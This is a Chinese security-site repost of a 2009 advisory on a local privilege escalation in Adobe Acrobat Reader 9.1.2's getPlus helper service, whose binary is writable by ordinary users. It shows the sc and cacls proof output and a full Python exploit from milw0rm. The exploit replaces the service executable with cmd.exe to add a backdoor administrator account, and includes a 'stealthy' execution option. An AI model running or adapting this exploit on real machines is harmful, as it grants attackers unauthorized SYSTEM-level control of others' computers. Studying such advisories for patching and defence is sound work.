您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

Adobe本地提权漏洞

2009-7-29 13:21| 投稿: security

摘要: 描述:Adobe下载者(此处指downloader文件)用来下载为Adobe应用程序下载更新在Acrobat Reader9.x下测试可执行文件可以被系统内置用户以提升为“完全控制”的系统权限来安装,...
描述:Adobe下载者(此处指downloader文件)用来下载为Adobe应用程序下载更新在Acrobat Reader9.x下测试可执行文件可以被系统内置用户以提升为“完全控制”的系统权限来安装,任何用户都可以替换改文件来达到自己的目的。在系统重启后它将以"SYSTEM"权限运行。description:Adobe downloader used to download updates for Adobe applications.Shipped with Acrobat Reader 9.x poc: C:\>sc qc "getPlus(R) Helper"[SC] GetServiceConfig SUCCESS SERVICE_NAME: getPlus(R) Helper        TYPE               : 110  WIN32_OWN_PROCESS (interactive)        START_TYPE         : 3   DEMAND_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : getPlus(R) Helper        DEPENDENCIES       : RPCSS        SERVICE_START_NAME : LocalSystem C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-------------- [!!!]                                           NT AUTHORITY\SYSTEM:FThe executable file is installed with improper permissions, with "fullcontrol" for Builtin Users; a simple user can replace it with a binary ofchoice.At the next reboot it will run with SYSTEM privileges. 昨天Milw0rm上刚刚给出了Phthon的利用代码,内容如下: 复制内容到剪贴板程序代码 #!/usr/bin/env python#################################################################################### Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit# Coded By: Dr_IDE# Discovered by: Nine:Situations:Group# Tested On: Windows XP SP2, Requires NOS Package Installed# Usage: python Dr_IDE-Adobe_912.py################################################################################### import os, subprocess ## Should probably have a try block around this as not every install# of 9.1.2 has the NOS package on it. This is a little touchy so you may have to# play around with it.## This is a super lame way to do this but it makes it more educational.evil =  "echo *************************************************************\n"evil += "echo *\n"evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n"evil += "echo * Coded By: Dr_IDE\n"evil += "echo * Discovered By: Nine:Situations:Group\n"evil += "echo * Tested On: Windows XP SP2\n"evil += "echo *\n"evil += "echo *************************************************************\n"evil += "echo This will add user Dr_IDE:password to the Admin Group\n"evil += "cd C:\\Program Files\\NOS\\bin\n"evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n"evil += "copy /Y %systemroot%\\system32\\cmd.exe\n"evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n"evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n"evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n"evil += "exit" f1 = open('Dr_IDE-Adobe.bat','w');f1.write(evil);f1.close(); # Here are two ways to execute this exploit. If you leave both commented just the batch file is created. # Silent Way - This should be more stealthy#retval = subprocess.call("Dr_IDE-Adobe.bat"); # Louder Way - On some systems this will probably open a DOS window#retval = os.system("Dr_IDE-Adobe.bat"); # milw0rm.com [2009-07-27]

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部